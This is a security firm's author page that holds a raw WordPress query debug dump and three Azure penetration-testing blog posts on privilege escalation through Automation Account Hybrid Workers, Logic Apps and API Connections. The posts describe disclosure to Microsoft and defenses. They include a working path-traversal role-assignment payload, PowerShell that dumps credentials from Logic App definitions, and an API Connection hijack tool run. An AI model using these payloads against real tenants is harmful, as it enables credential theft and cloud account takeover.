Josh Magri

Josh has a B.A. in Computer Science from the University of Iowa and currently holds the GSEC, GCIH, GCFA, and OSCP certifications. He has experience as a penetration tester, red teamer, and application security consultant.
More by Josh Magri
WP_Query Object
(
    [query] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "98"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "98"
                            [compare] => LIKE
                        )

                )

        )

    [query_vars] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "98"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "98"
                            [compare] => LIKE
                        )

                )

            [error] => 
            [m] => 
            [p] => 0
            [post_parent] => 
            [subpost] => 
            [subpost_id] => 
            [attachment] => 
            [attachment_id] => 0
            [name] => 
            [pagename] => 
            [page_id] => 0
            [second] => 
            [minute] => 
            [hour] => 
            [day] => 0
            [monthnum] => 0
            [year] => 0
            [w] => 0
            [category_name] => 
            [tag] => 
            [cat] => 
            [tag_id] => 
            [author] => 
            [author_name] => 
            [feed] => 
            [tb] => 
            [paged] => 0
            [meta_key] => 
            [meta_value] => 
            [preview] => 
            [s] => 
            [sentence] => 
            [title] => 
            [fields] => 
            [menu_order] => 
            [embed] => 
            [category__in] => Array
                (
                )

            [category__not_in] => Array
                (
                )

            [category__and] => Array
                (
                )

            [post__in] => Array
                (
                )

            [post__not_in] => Array
                (
                )

            [post_name__in] => Array
                (
                )

            [tag__in] => Array
                (
                )

            [tag__not_in] => Array
                (
                )

            [tag__and] => Array
                (
                )

            [tag_slug__in] => Array
                (
                )

            [tag_slug__and] => Array
                (
                )

            [post_parent__in] => Array
                (
                )

            [post_parent__not_in] => Array
                (
                )

            [author__in] => Array
                (
                )

            [author__not_in] => Array
                (
                )

            [ignore_sticky_posts] => 
            [suppress_filters] => 
            [cache_results] => 1
            [update_post_term_cache] => 1
            [update_menu_item_cache] => 
            [lazy_load_term_meta] => 1
            [update_post_meta_cache] => 1
            [nopaging] => 1
            [comments_per_page] => 50
            [no_found_rows] => 
            [order] => DESC
        )

    [tax_query] => WP_Tax_Query Object
        (
            [queries] => Array
                (
                )

            [relation] => AND
            [table_aliases:protected] => Array
                (
                )

            [queried_terms] => Array
                (
                )

            [primary_table] => wp_posts
            [primary_id_column] => ID
        )

    [meta_query] => WP_Meta_Query Object
        (
            [queries] => Array
                (
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "98"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "98"
                            [compare] => LIKE
                        )

                    [relation] => OR
                )

            [relation] => OR
            [meta_table] => wp_postmeta
            [meta_id_column] => post_id
            [primary_table] => wp_posts
            [primary_id_column] => ID
            [table_aliases:protected] => Array
                (
                    [0] => wp_postmeta
                )

            [clauses:protected] => Array
                (
                    [wp_postmeta] => Array
                        (
                            [key] => new_authors
                            [value] => "98"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                    [wp_postmeta-1] => Array
                        (
                            [key] => new_presenters
                            [value] => "98"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                )

            [has_or_relation:protected] => 1
        )

    [date_query] => 
    [request] => 
			SELECT   wp_posts.*
			FROM wp_posts  INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )
			WHERE 1=1  AND ( 
  ( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{59818eb26bdd304a8ac343743135e62a6fa7124a2d9b1aa8d287f984544382ae}\"98\"{59818eb26bdd304a8ac343743135e62a6fa7124a2d9b1aa8d287f984544382ae}' ) 
  OR 
  ( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{59818eb26bdd304a8ac343743135e62a6fa7124a2d9b1aa8d287f984544382ae}\"98\"{59818eb26bdd304a8ac343743135e62a6fa7124a2d9b1aa8d287f984544382ae}' )
) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))
			GROUP BY wp_posts.ID
			ORDER BY wp_posts.post_date DESC
			
		
    [posts] => Array
        (
            [0] => WP_Post Object
                (
                    [ID] => 27649
                    [post_author] => 98
                    [post_date] => 2022-04-14 11:30:52
                    [post_date_gmt] => 2022-04-14 16:30:52
                    [post_content] => 

The NetSPI team recently discovered a set of issues that allows any Azure user with the Subscription Reader role to dump saved credentials and certificates from Automation Accounts. In cases where Run As accounts were used, this allowed for a Reader to Contributor privilege escalation path.

This is part two of a two-part blog series. In part one, we walked through a privilege escalation scenario by abusing Azure hybrid workers. In this blog, we’ll dig a little deeper and explain how we utilized an undocumented internal API to poll information about the Automation Account (Runbooks, Credentials, Jobs).

Note: The scope of this bug is limited to a subscription. A subscription Reader account is necessary to exploit this bug, and it is not a cross-tenant issue.

Background: Azure Hybrid Worker Groups

The genesis of this research stemmed from studying any potential abuse mechanisms from how Azure Automation handled authenticating Hybrid Worker nodes.

Azure Automation’s core feature is Runbooks, which are pieces of code that can be run on Azure’s Infrastructure or customer-owned Azure Virtual Machines (VMs). These are often used to run scheduled tasks or manage Azure resources. To accomplish this, the runbooks must be authenticated, which can be accomplished through several methods.  

Users can store credentials in Automation Accounts (AA) and access them via Runbooks. Automation Accounts can also use Run As accounts to create a Service Principal that will be used for authentication via a certificate stored in the Automation Account.  

The third option is using Managed Identities, which is what Microsoft is pushing users towards. Managed Identities allow the user to obtain a token at runtime to authenticate and eliminate the issue of stored credentials. The Get-AzPasswords script from the MicroBurst project supports dumping all three kinds of authentication, so long as you have Contributor access.  

Normally, a Runbook is executed in a sandbox on Azure’s infrastructure. However, this comes with certain constraints, namely processing power and execution time. Any long running or resource intensive code may be ill-suited to run in this manner.  

To bridge this gap, Azure offers Hybrid Worker Groups (HWG). HWGs offer users the ability to run Runbooks on their own Azure Virtual Machines, so they can run on more powerful machines for longer.  

Normally, this is accomplished by deploying a Virtual Machine Extension to the desired Virtual Machine to register the Virtual Machine as a HWG node. Then, the user can execute Runbooks on those Hybrid Worker nodes.  

There are also two types of HWGs: User and System. System HWGs are used for Update Management and don’t have the necessary permissions for what we’re interested in, so we’ll be focusing on User HWGs.

The First Set of Issues: Compromising Credentials

We began our research with a registered Hybrid Worker node. When you execute a runbook on the host, the HybridWorkerService process spawns the Orchestrator.Sandbox process. The command line for the latter is as follows.

Next, we focused on MSISecret. At first glance, it appears that the Hybrid Worker node must be able to use this to request an MSI token externally. After reversing the binary, this turned out to be true. 

Every Automation Account has a “Job Runtime Data Service” endpoint, or JRDS, which Hybrid Workers use to poll for jobs and request credentials. You can see the JRDS URL supplied in the command line above. Below is what the full path to request a token looks like in the binary. 

And here you can see this in action.

You can only get that MSI secret after receiving a job from the JRDS endpoint. This can be achieved by polling the /sandboxes endpoint. HWGs handle jobs in a first-come-first-serve fashion, so whichever node polls the endpoint first starts first. By default, nodes will poll every 60 seconds so if polled constantly, then we should almost always beat out the other nodes and get a job with a secret. However, this only works if Runbooks jobs are actively being run through the HWG.

Since we’re able to request Managed Identity tokens, it would make sense that we can request other forms of authentication. A quick grep through of the decompiled binary makes this apparent, and a quick request to these endpoints will yield results. 

The JSON Web Token (JWT) in these requests is for the System Assigned MI of the Virtual Machine, not a management token for Azure.

Requesting all certificates:

We were satisfied with these findings. We figured that this represented an escalation path from Virtual Machine Contributor to Subscription Contributor if Hybrid Worker nodes were in use and reported our findings to Microsoft.

Escalating Our Findings

After we had submitted our report, we found a recently published blog that detailed some of these same ideas, though their thesis was obtaining lateral movement after an administrator pushed a certificate to the Virtual Machine. The author also demonstrated that you could register a new Hybrid Worker node to an Automation Account using the Automation Account key and Log Analytics Workspace key. We wondered if we could abuse this route to escalate the severity of our previous findings.

To read Automation Account keys, a user only needs the Reader role. To exploit this, we hacked up some source code from Microsoft’s Desired State Configuration (DSC) repository.

The repository contained some scripts that are used to register a new Hybrid Worker node, so we bypassed some environment checks and created users/groups that are expected to exist. The registration process looks like this: 

  1. Generate a new self-signed certificate or use an existing one
  2. Create a payload with some details: HWG name, IP address, certificate thumbprint, etc.
  3. Sign the payload with the AA key
  4. Send a PUT request to the AA with all the above info 

This also does not require Hybrid Worker Groups to already be in use; we can supply an arbitrary group name and it will be created. After registering, we can use the certificate and key generated during this process to access the same endpoints that we identified earlier. You also don’t need a Log Analytics workspace key to register because not all AAs are linked to a workspace. 

From start to finish, this exploit works as follows: 

  1. Attacker with Reader access reads the victim Automation Account key
  2. Attacker uses this key to register their own Virtual Machine in their own tenant as a Hybrid Worker node
  3. Attacker can dump any credentials or certificates from the victim AA and use them to authenticate 

We reported this issue to MSRC in a separate report. Below is the timeline for this case: 

  • October 25, 2021: Initial report submitted 
  • December 13, 2021: Second report submitted with details of full privilege escalation 
  • December 31, 2021: $10k bounty awarded 
  • March 14, 2022: Patch is applied 

Microsoft’s Response to the Azure Automation Account Vulnerabilities

After reporting our findings, Microsoft identified the Azure Automation customers vulnerable to this exploit and notified them through the Azure portal. A fix has been rolled out to all customers.

Additionally, Microsoft has updated their documentation with mitigation steps for customers. They’ve updated the Reader role so that it no longer has the ListKeys permission on Automation Accounts and can no longer fetch Automation Account keys. They recommend that customers switch to custom roles if they need a Reader to fetch the Automation Account keys.

Microsoft has also provided the following guidance for deploying Hybrid Workers:

Microsoft recommends installing Hybrid workers using the Hybrid Runbook Worker Virtual Machine extension – without using the automation account keys – for registration of hybrid worker. Microsoft recommends this platform as it leverages a secure Azure AD based authentication mechanism and centralizes the control and management of identities and other resource credentials. Refer to the security best practices for Hybrid worker role.

Conclusion

This issue allowed any user who could read Automation Account keys to extract any credentials or certificates from the affected Automation Account. This issue was not particularly technical or difficult to exploit, and only abused the intended methods for registration and credential retrieval. 

This is a good reminder that even low privileged role assignments such as Reader can have unintended consequences in your cloud environment. 

Want to learn more about cloud penetration testing? Consider registering for NetSPI’s upcoming Dark Side Ops: Azure Cloud Pentesting training or explore our Azure cloud penetration testing service.

[post_title] => Abusing Azure Hybrid Workers for Privilege Escalation – Part 2: An Azure PrivSec Story [post_excerpt] => Discover how an Azure user with the Subscription Reader role can compromise credentials or certificates from Automation Accounts and escalate to a Contributor level role. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => abusing-azure-hybrid-workers-part-2 [to_ping] => [pinged] => [post_modified] => 2022-04-14 11:30:54 [post_modified_gmt] => 2022-04-14 16:30:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27649 [menu_order] => 106 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [1] => WP_Post Object ( [ID] => 27471 [post_author] => 98 [post_date] => 2022-03-09 08:00:00 [post_date_gmt] => 2022-03-09 14:00:00 [post_content] =>

In October 2021, I was performing an Azure penetration test. By the end of the test, I had gained Owner access at the Root level of the tenant. This blog post will provide a short walkthrough of what I found and disclosed to the Microsoft Security Response Center (MSRC).

What was the bug?

The short explanation is that having Contributor access to an Azure Resource Manager (ARM) API Connection would allow you to create arbitrary role assignments as the connected user. This was supposed to be limited to actions at the Resource Group level, but an attacker could escape to the Subscription or Root level with a path traversal payload.

How did I find it?

It’s fair to say that I have spent a lot of time hacking on Logic Apps, and I experience a lot of recency bias with the services that I’ve dug into. After I published my Logic App research, I started seeing Logic Apps popping up on my tests. 

To recap, Azure Logic Apps use API Connections to authenticate actions to services. In my blog, Illogical Apps – Exploring and Exploiting Azure Logic Apps, I discuss how to tease unintended functionality out of Logic Apps to perform actions as the authenticated user. The examples I use involve listing out additional key vault keys or adding users to Azure AD. 

When we create an API Connection, it requires a user to authenticate it. That authentication will persist for the lifetime of the API Connection, unless changes are made to it which will invalidate the connection. You can view the connection dialog below.

API Connection dialog

In this environment there was an Azure Resource Manager API Connection authenticated as a user with User Access Administrator rights at the Root level. If you’re not familiar with Azure terminology, the User Access Administrator role allows for creating new role assignments, and the Root level is the highest tier in an Azure tenant. I had not looked at the ARM connector in my prior research, but I was confident we could abuse this level of access.

Initial Recon

Generally, our goal is to escalate to the Owner role on a Subscription. This is similar to getting Domain Administrator (DA) on an internal network penetration test in the sense that it is a bit oversimplified, but very useful for demonstrating the severity of a finding. I started looking at the relevant ARM actions that I could use to achieve this. Consulting the Microsoft documentation, “Create or update a resource group” looked like a good starting point. But looking at the parameters for the action, the Subscription and Resource Group parameters are required.

Create or update a resource group

While they’re required, we can insert custom values. If we make the Resource Group blank, will that work? No. Here’s why: API Connections are just wrappers around an API as the name would suggest. These APIs are defined by Swagger docs, and we can pull down the whole Swagger definition by using an ARM API Connection in a Logic App and making a request to the following resource:

/subscriptions/{subscription}d/resourceGroups/{resourceGroupName}/
Providers/Microsoft.Logic/Workflows/{LogicAppName}?api-version=
2016-10-01&$expand=properties/swagger

Looking at the Swagger definition, the endpoint for this action is a PUT request to this path:

/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/
providers/{resourceProviderNamespace}/{shortResourceId}

So, we can reasonably assume that when we use a blank Resource Group name, a request is getting made to:

/subscriptions/{subscriptionId}/resourceGroups//providers/
[truncated]

And we get an error since this Resource Group does not exist. At this point, I verified that using a valid Subscription and Resource Group name, it was possible to create Role Assignments at the Resource Group level. This is because Role Assignments are created like any other resource in Azure. At a minimum I was able to (as a Contributor) give myself Owner rights on all the Resource Groups in a Subscription. Still not a bad privilege escalation, but we can do better.

You might have spotted where this is headed given the format of the path above. If we can include custom values for the Resource Group and Subscription, can we manipulate the final path to perform actions at different scopes? If we provide “..%2F” as the Resource Group name, then our path will match the right Swagger path, but the server will resolve the payload and our request will end up going to:

/subscription/{subscriptionId}/providers/[truncated]

Now we can create Role Assignments at the Subscription level! Taking this one step further, we can traverse the Subscription path too, and create Role Assignments at the Root level (if the connected user has sufficient access).

Unnecessary Optimizations

At this point I had a working exploit in my lab, and I went to reproduce it in the client environment. It went off without a hitch, and I was now a Subscription Owner. While I was setting up the Logic App, I noticed something that I hadn’t before: Since my lab environment is very small, when I clicked the Subscription dropdown menu, it was populated with Subscriptions that my account didn’t have access to. This meant that these Subscriptions were being fetched in the context of the API Connection user – but I hadn’t run a Logic App.

To track down the behavior, I fired up Burp Suite and found that a request was being made to the “dynamicInvoke” endpoint of the API Connection. The request payload looked like this:

{"request":{"method":"get","path":"/subscriptions","queries":
{"x-ms-api-version":"2016-06-01"},}}

And the response looked like this:

"response":{"statusCode":"OK","body":{"value":[{"id":
"/subscriptions/[REDACTED]","authorizationSource":"RoleBased",
"subscriptionId":"[REDACTED]","displayName":"temp_sub","state":
"Enabled","subscriptionPolicies":{"locationPlacementId":
"Public_2014-09-01","quotaId":"PayAsYouGo_2014-09-01",
"spendingLimit":"Off"}}]},

Another area that I’ve spent a lot of time looking at is Azure’s REST API. Given that the response JSON included a status code, I figured the request to the dynamicInvoke endpoint triggered the server into making a request in the context of the connected user. 

For those curious, my understanding is that the server makes a request to https://logic-apis-[region].token.azure-apim.net:443/tokens/logic-apis-[region]/[connectorname]/[connector-id]/exchange which returns a token to the server. 

You can verify this by sending malformed input in the path value to the dynamicInvoke endpoint and observing the output. I assume that the returned token is then used to access the relevant services as the connected user.

Anyways, we can just hit this endpoint directly to trigger our exploit instead of creating a Logic App. This is what the final payload looked like:

{
   'request':{
'method':'PUT','path':'/subscriptions/$subscriptionId/
resourceGroups/..%2Fproviders/Microsoft.Authorization/
roleAssignments%2F$guid',
        'queries':{'x-ms-api-version':'2015-07-01'},
        'body':{
            'properties':{
                'principalId': '$principalId',
                'roleDefinitionId': '/providers/
Microsoft.Authorization/roleDefinitions/$roleDefinitionId'
}}}

I also confirmed that trying to hit the Subscription directly (without the resourceGroups part) via this endpoint did not work, it would yield a 404 error. But if we included the path traversal payload, then a nice “201 Created” message was returned instead. This is important, because it is proof that this wasn’t an intended behavior. 

Conclusion

To summarize, I was able to escalate from a Subscription Contributor to Root Owner by abusing an API Connection. The root cause of this behavior was that a path traversal payload would meet the Swagger API definition, and the payload would be resolved by the server resulting in a request to an unintended scope. 

This issue was responsibly disclosed to MSRC and acknowledged by Microsoft in March 2022. They remediated the issue by filtering the method value to block the paths that include the path traversal payload. 

I would still recommend that anyone using API Connections should evaluate what users are authenticated for each connection. If any of the authenticated users are privileged, there may a possibility for abuse.

[post_title] => Escalating from Logic App Contributor to Root Owner in Azure [post_excerpt] => This Azure pentesting blog post walks through a Privilege Escalation bug in Azure Logic Apps. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-logic-app-contributor-escalation-to-root-owner [to_ping] => [pinged] => [post_modified] => 2022-03-07 17:08:48 [post_modified_gmt] => 2022-03-07 23:08:48 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27471 [menu_order] => 121 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 26244 [post_author] => 98 [post_date] => 2021-08-26 08:00:00 [post_date_gmt] => 2021-08-26 13:00:00 [post_content] =>

When we’re doing Azure cloud penetration tests, every single one is different. Each environment is set up differently and uses different services in tandem with one another to achieve different goals. For that reason, we’re constantly looking for new ways to abuse different Azure services. In this blog post, I’ll talk about the work I’ve done with abusing Azure Logic Apps. I’ll walk through how to obtain sensitive information as a user with the Reader role and how to identify/abuse API Connection hijack scenarios as a Contributor.

What are Logic Apps?

In Azure, Logic Apps are similar to Microsoft’s “Power Automate” family, which my colleague Karl Fosaaen examined in his blog, Bypassing External Mail Forwarding Restrictions with Power Automate. A Logic App is a way to write low-code or no-code workflows for performing automated tasks.

Here’s an example workflow:

  • Every day at 5:30PM
  • Check the “reports” inbox for new emails
  • If any emails have “HELLO” in the subject line
  • Respond with “WORLD!”

In order to perform many useful actions, like accessing an email inbox, the Logic App will need to be authenticated to the attached service. There are a few ways to do this, and we’ll look at some potential abuse mechanisms for these connections.

As a Reader

Testing an Azure subscription with a Reader account is a fairly common scenario. A lot of abuse scenarios for the Reader role stem from finding credentials scattered throughout various Azure services, and Logic Apps are no different. Most Logic App actions provide input parameters for users to provide arguments, like a URL or a file name. In some cases, these inputs include authentication details. There are many different actions that can be used in a Logic App, but for this example we’ll look at the “HTTP Request” action.

Below is an HTTP Request action in the Logic App designer, with “Authentication” enabled. You can see there are several fields that may be interesting to an attacker. Once these fields are populated and saved, any Reader can dump them out of the Logic App definition.

HTTP Request action in the Logic App designer, with “Authentication” enabled

As a tester, I wanted a generic way to dump these out automatically. This is pretty easy with a few lines of PowerShell.

$allLogicApps = Get-AzLogicApp
foreach($app in $allLogicApps){
    $appName = $app.Name.ToString()
    $actions = ($app.Definition.ToString() | ConvertFrom-Json | select actions).actions
    #App definition is returned as a Newtonsoft object, have to manipulate it a bit to get all of the desired output
    $noteProperties = Get-Member -InputObject $actions | Where-Object {$_.MemberType -eq "NoteProperty"}
    foreach($note in $noteProperties){
        $noteName = $note.Name
        $inputs = ($app.Definition.ToString() | ConvertFrom-Json | Select actions).actions.$noteName.inputs    
    }
    $params = $app.Definition.parameters
}

The above snippet provides the raw definition of the Logic App, all of the inputs to any action, and any parameters provided to the Logic App. Looking at the inputs and parameters should help distill out most credentials and sensitive information but grepping through the raw definition will cover any corner cases. I’ve also added this to the Get-AzDomainInfo script in the MicroBurst toolkit. You can see the results below.

Get-AzDomainInfo script in the MicroBurst toolkit

For something like the basic authentication or raw authentication headers, you may be able to gain access to an externally facing web application and escalate from there. However, you may be able to use the OAuth secret to authenticate to Azure AD as a service principal. This may offer more severe privilege escalation opportunities.

Another thing to look out for as a Reader are the “Run History” and “Versions” tabs. 

The Run History tab contains a history of all previous runs of the Logic App. This includes the definition of the Logic App and any inputs/outputs to actions. In my experience, there is a tendency to leak sensitive information here. For example, below is a screenshot of the Run History entry for a Logic App that dumps all secrets from a Key Vault.

This is a screenshot of the Run History entry for a Logic App that dumps all secrets from a key vault.

While dumping all secrets is unrealistic, a Logic App fetching a secret that is then used to access another service is fairly common. After all, Key Vaults are (theoretically) where secrets should be fetched from. By default, all actions will display their output in Run History, including sensitive actions like getting secrets from a Key Vault. Some actions that seem interesting are actually benign, like fetching a file from SharePoint doesn’t just leak the raw file, but others can be a gold mine. 

The Versions tab contains a history of all previous definitions for the Logic App. This can be especially useful for an attacker since there is no way to remove a version from here. A common phenomenon across any sort of development life cycle is that an application will initially have hardcoded credentials, which are later removed for one reason or another. In this case, we can simply go back to the start of the Logic App versions and start looking for removed secrets. 

The Versions tab contains a history of all previous definitions for the Logic App.

It’s worth noting that this is largely the same information as the Run History tab and is actually less useful because it does not contain inputs/outputs obtained at runtime, but it does include versions that were never run. So, if a developer committed secrets in a Logic App and then removed them without running the Logic App, we can find that definition in the Versions tab. 

I’ve added a small function, Get-AzLogicAppUnusedVersions, to MicroBurst which will take a target Logic App and identify any versions that were created but not used in a run. This may help to identify which versions you can find in the Run History tab, and which are only in the Versions tab.

Interested in MicroBurst? Check out NetSPI’s other open source tools

Testing Azure with Contributor Rights

As with all things Azure, if you have Contributor rights, then things become more interesting. 

Another way to provide Logic Apps with authentication is by using API Connections. Each API connection will pertain to a certain Azure service such as Blob Storage or Key Vaults, or a third-party service like SendGrid. In certain cases, we can reuse these API Connections to tease out some, perhaps unintended, functionality. For example, a legitimate user creates an API Connection to a Key Vault, which could then be used to access another service. However, if we create our own Logic App, then we can perform related actions in the context of the user who created the API Connection. 

Here’s how the scenario that I described above would work.

  1. An administrator creates the Encrypt-My-Data-Logic-App and gives it an API connection to the Totally-Secure-Key-Vault
  2. A Logic App Contributor creates a new Logic App with that API connection 
  3. The new Logic App will list all secrets in the Key Vault and dump them out
  4. The attacker fetches the dumped secrets from the Logic App output and then deletes the app

To be clear, this isn’t really breaking the Azure or Logic Apps permissions model. When the API Connection is created, it is granted access to an explicit resource. But it’s very possible that a user will grant access to a resource without knowing that they are exposing additional functionality to other Contributors. At least from what I have seen, it is not made evident to users that API Connections can be reused in this manner.

For the example above, you may be saying “So what, a Contributor can just dump the passwords anyways.” You would be correct, but to perform this attack you only need two permissions: Microsoft.Web/connections/* and Microsoft.Logic/*. This can come into play for custom roles, users with the Logic App Contributor role, or users with Contributor scoped to a Resource Group.

For example: an attacker has Contributor over the “DevEnvironment” Resource Group. For one reason or another, an administrator creates an API Connection to the “ProdPasswords” Key Vault. The ProdPasswords vault is in the “ProdEnvironment” Resource Group, but the API Connection is in the DevEnvironment RG. Since the attacker has Contributor over the API Connection, they can create a new Logic App with this API Connection and dump the ProdPasswords vault. This scenario is a bit contrived but in essence you may be able to access resources that you normally could not.

For example: an attacker has Contributor over the “DevEnvironment” Resource Group. For one reason or another, an administrator creates an API Connection to the “ProdPasswords” Key Vault. The ProdPasswords vault is in the “ProdEnvironment” Resource Group, but the API Connection is in the DevEnvironment RG. Since the attacker has Contributor over the API Connection, they can create a new Logic App with this API Connection and dump the ProdPasswords vault. This scenario is a bit contrived but in essence you may be able to access resources that you normally could not.

For other types of connections, the possibilities for abuse become less RBAC-specific. Let’s say there’s a connection to Azure Active Directory (AAD) for listing out the members of an AD group. Maybe the creator of the connection wants to check an email to see if the sender is a member of the “C-SUITE VERY IMPORTANT” group and mark the email as high priority. Assuming this user has AAD privileges, we could hijack this API Connection to add a new user to AAD. Unfortunately, we can’t assign any Azure subscription RBAC permissions since there is no Logic App action for this, but it could be useful for establishing persistence. 

Situationally, if the subscription in question has an Azure Role Assignment for an AAD group, then this does enable us to add our account (or our newly created user) to that group. For example, if the “Security Team” AAD group has Owner rights on a subscription, you can add your account to the “Security Team” group and you are now an Owner. 

  1. The Administrator user creates and authorizes the User-Lookup-Logic-App
  2. An attacker with Contributor creates a new Logic App with this connection
  3. The new Logic App adds the “attacker” user to Azure AD and adds it to the “Security Team” group
  4. The attacker deletes the Logic App
  5. The attacker authenticates to AAD with the newly added account, which now has Owner rights on the subscription from the “Security Team” group

Ryan Hausknecht (@haus3c) discussed the above scenario in a blog about PowerZure. He mentions that he chose not to implement this into PowerZure due to the sheer number of potential actions. As a result, there is no silver bullet abuse technique. However, I wanted a way to make this as plug-and-play as possible. 

API Hijacking in Practice 

Here is a high-level overview of programmatically hijacking an API Connection.

  1. In your own Azure tenant, create a Logic App (LA) replicating the functionality that you want to achieve and place the definition into a file. (This step is manual)
  2. Get the details of the target API Connection
  3. Plug the connection details and the manually created definition into a generic LA template
  4. Create a new LA with your malicious definition
  5. Retrieve the callback URL for the LA and trigger it to run
  6. Retrieve any output or errors
  7. Delete the LA

Since this is a scenario-specific attack, I’d like to walk through an example. I’ll show how to create a definition to exploit the Key Vault connection as I described earlier. I’ve published the contents which result from following these steps, so you can skip this if you’d prefer to just use the existing tooling.

First, you’ll need to have a Key Vault set up. Put at least one secret and one key in there, so that you have targets for testing. 

You’ll want to create a Logic App definition that looks as follows.

Creating a Logic App definition

If you run this, it should list out the secrets from the Key Vault which you can view within the portal. However, if we want to fetch the results via PowerShell, we’ll need to take one more step.

Select the “Logic app code view” window. Right now, the “outputs” object should be empty. Change it to the following, where “secrets_array” is the name of the variable you used earlier. 

“object”: {
"result": {
                "type": "Array",
                "value": "@variables('secrets_array')"
            }
}

Now you can get the output of that workflow from the command line as follows:

$history = (Get-AzLogicAppRunHistory -ResourceGroupName "main_rg" -Name "hijackable")[0]; $history.Outputs.result.Value.ToString()

You can see this in action in the example below.

Automation!

So, above is how you would create the Logic App within your own tenant. Automating the process of deploying this definition into the target subscription is as simple as replacing some strings in a template and then calling the standard Az PowerShell functions. I’ve rolled all of this into a MicroBurst script, Invoke-APIConnectionHijack, which is ultimately a wrapper around the Az PowerShell module. The main function is automating away some of the formatting nonsense that I had to fight with when doing this manually. I’ve also placed the above Key Vault dumping script here, which can be used as a template for future development.

The script does the following:

  • Fetches the details of a target connection
  • Fetches the new Logic App definition
  • Formats the above information to work with the Az PowerShell module
  • Creates a new Logic App using the updated template
  • Runs the new Logic App waits until it is completed and fetches output, and then deletes the Logic App

To validate that this works, I’ve got a user with just the Logic App Contributor role in my subscription. So, this user cannot dump out key vault keys.

To validate that this works, I’ve got a user with just the Logic App Contributor role in my subscription. So this user cannot dump out Key Vault keys.

I’ve also changed the normal Logic App definition to a workflow that just runs “Encrypt data with key”, to represent a somewhat normal abuse scenario. And then…

PS C:\Tools\microburst\Misc\LogicApps> Get-AzKeyVault
 
PS C:\Tools\microburst\Misc\LogicApps> Invoke-APIConnectorHijack -connectionName "keyvault" -definitionPath .\logic-app-keyvault-dump-payload.json -logicAppRg "Logic-App-Template"
Creating the HrjFDGvgXyxdtWo logic app...
Created the new logic app...
Called the manual trigger endpoint...
Output from Logic App run:
[
  {
    "value": "test-secret-value",
    "name": "test-secret",
    "version": "c1a95beef1e640a0af844761e1a842cf",
    "contentType": null,
    "isEnabled": true,
    "createdTime": "2021-07-07T19:24:06Z",
    "lastUpdatedTime": "2021-07-07T19:24:06Z",
    "validityStartTime": null,
    "validityEndTime": null
  }
]
Successfully cleaned up Logic App 

And there you have it! A successful API Connection hijack.

Detection/Defenses for your Azure Environment

Generally, one of the best hardening measures for any Azure environment is having a good grip on who has what rights, and where they are applied. The Contributor role will continue to provide plenty of opportunities for privilege escalation, but this is a good reminder that even service-specific roles like Logic App Contributor should be treated with caution. These roles can provide unintended access to other connected services. Users should always be provided with the most granular, least privileged access wherever possible. This is much easier said than done, but this is the best way to make my life as an attacker more frustrating.

To defend against the leakage of secrets in Logic App definitions, you can fetch the secrets at run time using a Key Vault API connection. I know this seems a bit counter intuitive given the subject of this blog, but this will prevent readers from being able to obtain cleartext credentials in the definition.

To prevent the leakage of secrets in the inputs/outputs to actions in the Run History tab, you can enable the “Secure Input/Output” setting for any given action. This will prevent the input/output to the action from showing up in that run’s results. You can see this below.

To prevent the leakage of secrets in the inputs/outputs to actions in the Run History tab, you can enable the “Secure Input/Output” setting for any given action. This will prevent the input/output to the action from showing up in that run’s results.

Unfortunately, there isn’t a switch to flip for preventing the abuse of API Connections. 

I often find it helpful to think of Azure permissions relationships using the same graph logic as BloodHound (and its Azure ingestor, AzureHound). When we create an API Connection, we are also creating a link to every Contributor or Logic App Contributor in the subscription. This is how it would look in a graph.

When we create an API Connection, we are also creating a link to every Contributor or Logic App Contributor in the subscription. This is how it would look in a graph.

In essence, when we create an API Connection with write permissions to AAD, then we are transitively giving all Contributors that permission.

In my opinion the best way to prevent API Connection abuse is to know that any API Connection that you create can be used by any Contributor on the subscription. By acknowledging this, we have a justification to start assigning users more granular permissions. Two examples of this may look like:

  • A custom role that provides users with almost normal Contributor rights, but without the Microsoft.Web/connections/* permission. 
  • Assigning a Contributor at the Resource Group level.

Conclusion

While the attack surface offered by Logic Apps is specific to each environment, hopefully you find this general guidance useful while evaluating your Logic Apps. To provide a brief recap:

  • Readers can read out any sensitive inputs (JWTs, OAuth details) or outputs (Key Vault secrets, results from HTTP request) from current/previous versions and previous runs
  • Defenders can partially prevent this by using secure inputs/outputs in their Logic App definitions
  • Contributors can create a new Logic App to perform any actions associated with a given API Connection
  • Defenders must be aware of who has Contributor rights to sensitive API Connections

Work with NetSPI on your next Azure cloud penetration test or application penetration testing. Contact us: www.netspi.com/contact-us.

